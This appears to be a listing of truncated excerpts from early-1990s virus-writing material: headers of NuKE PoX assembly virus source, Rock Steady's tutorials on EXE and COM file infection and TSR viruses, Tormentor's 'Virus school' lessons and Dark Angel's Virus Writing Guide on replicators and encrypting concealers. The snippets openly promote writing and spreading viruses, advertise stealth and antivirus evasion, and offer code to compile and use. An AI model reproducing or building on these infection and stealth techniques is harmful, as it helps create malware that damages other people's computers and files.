the diabolic JUDGES

;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ;-* (c) Rock Steady, Viral Developments -* ;*- (c) NuKE Software Developement 1991, 1992 *- ;-* Virus: NuKE PoX Version 1.1 (Alias: Evil Genius, NPox) -* ;*- ~~~~~~ *- ;-* Notes: Resident EXE & COM Infecting, Memory Stealth, Directory -* ;*- ~~~~~~ Stealth (FCB Method), Anti-Viral Products Aware, Infects *- ;-* COMMAND.COM on first Run, CTRL-ALT-DEL Aware... -* ;*- Bytes: 963 Bytes Memory: 963 Bytes *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* virus_size equ last - init_virus mut1 equ 3 mut2 equ 1 mut3 equ 103h del_code equ 5...

;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ;-* (c) Rock Steady, Viral Developments -* ;*- (c) NuKE Software Developement 1991, 1992 *- ;-* Virus: NuKE PoX Version 1.0 (Alias `Mutating Rocko') -* ;*- ~~~~~~ *- ;-* Notes: COM Infector, Hooks Int 9h & Int 21h, Memory Stealthness -* ;*- ~~~~~~ Dir Stealthness (FCB Way), Encrypting Virus (100 different *- ;-* Encrypted Copies of the Virus) -* ;*- Bytes: 609 Bytes Memory: (609 * 2) = 1,218 Bytes *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* crypt_size equ crypt - init_virus ;All that gets Incrypted virus_size equ last - ...

By Rock Steady/NuKE The first part consisted on how to Infect the EXE file, from a resident virus. However, that is only HALF the code and understanding needed for EXE infectors. The part to follow, is on how to give control back to the original EXE file. This is one part of EXE infectors, that mostly EVERY ONE tend to forget to point out. Big tickle, you know how to infect the EXE, but can you make the original EXE run after its infection? Do you know how to restore the registers we took from the EXE header? Anyhow lets get going... If the Infected EXE file is now executed, the first Line of Code it will encounter will be the first b...

EXE Infections : PART I `Infection Process' By Rock Steady/NuKE We must admit there are HUGE amount of Lame Viruses out there. Ever wonder why so many people talk about the AIDS virus? Its a fucken over writting virus. Its HUGE in size and its written in PASCAL. Please! Have a little more respect for the virus world. What happened to that old Bulgarian Spirit? That too has died. Bulgaria isn't writting as many top viruses as it used to! Or are we in for a surprise? (USSR Kicks!) Well to help people in advancing their Virus programming ability I will try to explain that basics in Infecting an EXE file. There are several ways t...

By Rock Steady/NuKE Well I must state my opinion that there are certainly WAY too many Overwriting Viruses out here. To help put a Stop to this I will try to explain to you a SIMPLE way to infect COM files at the END of the Program. This routine WORKS if you follow my steps correctly, and I've already used this in my `ParaSite ][' Virus. Anyhow this is a brief description what the ASM Source will do. Find a .COM file in the current Directory Save the Date and File's Attribute. Save the First 3 Bytes in a Stack Infect the File & restore new 3 bytes.. Put the OLD date and File Attributes back on Beginning... ;-----------...

TSR COM infections By Rock Steady/NuKE There are several ways to constructed your viruses. Mainly you have those which are RAM-Resident or better known as a TSR program. And with great thought we have those which are not RAM-Resident. A TSR virus will load into memory and can infect all programs that are executed by the computer. Such like my AmiLiA virus which will infect all EXE and COM files that are ran. Anyhow a TSR virus can certainly spread a lot faster compared to a Non-Resident Virus. Because a NON-Resident Virus will only infect file each time it is ran. Though the NON-Resident will start off very slowly infecting the syste...

; Virus Lession #2 'How to make a non-resident EXE infector' ; (c) 1992 Tormentor // Demoralized Youth ; Well, I had not time to comment this code as much as I wanted to, ; but here you are. ; What can be hard to understand is the .EXE header changes, but if ; you look at the description on the header (ex: Norton guide Tech. Ref) ; you'll understand... ; Anyway, feel free to use this example and if you have any questions ; or anything call my board: Swedish Virus Labratory +46-3191-9393 ; Greetings to all virus-writers! ; /Tormentor .model tiny .radix 16 .code Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of vir...

; Virus school, lession 1 (c) 1992 Tormentor [Demoralized Youth] ; This is the first lession on how to make an own virus. ; Hope you'll learn something of it... ; To be compiled with TASM 3.0 or higher. ; This virus is quite dumb and 'noisy' ; It updates the filedate and time, changes DTA before execution causing ; some progs to belive they are executed with parameters... ; But this should only be a 'raw' virus that you can develop. ; Certain program may hang, so i recommend you not to spread to geeks ; since there is MANY better viruses to use for such nice purpose. ; If you want to conntact me or other virus-writers...

INSTALLMENT III: NONRESIDENT VIRII, PART II Welcome to the third installment of my Virus Writing Guide. In the previous installment, I covered the primary part of the virus - the replicator. As promised, I shall now cover the rest of the nonresident virus and present code which, when combined with code from the previous installment, will be sufficient to allow anyone to write a simple virus. Additionally, I will present a few easy tricks and tips which can help optimise your code. THE CONCEALER The concealer is the most common defense virus writers use to avoid detection of virii. The most common encryption/decryption routine by far ...

Dark Angel's Chunky Virus Writing Guide INSTALLMENT II: THE REPLICATOR In the last installment of my Virus Writing Guide, I explained the various parts of a virus and went into a brief discussion about each. In this issue, I shall devote all my attention towards the replicator portion of the virus. I promised code and code I shall present. However, I shall digress for a moment because it has come to my attention that some mutant copies of the first installment were inadvertently released. These copies did not contain a vital section concerning the calculation of offsets. You never know where your variables and code are going to wind ...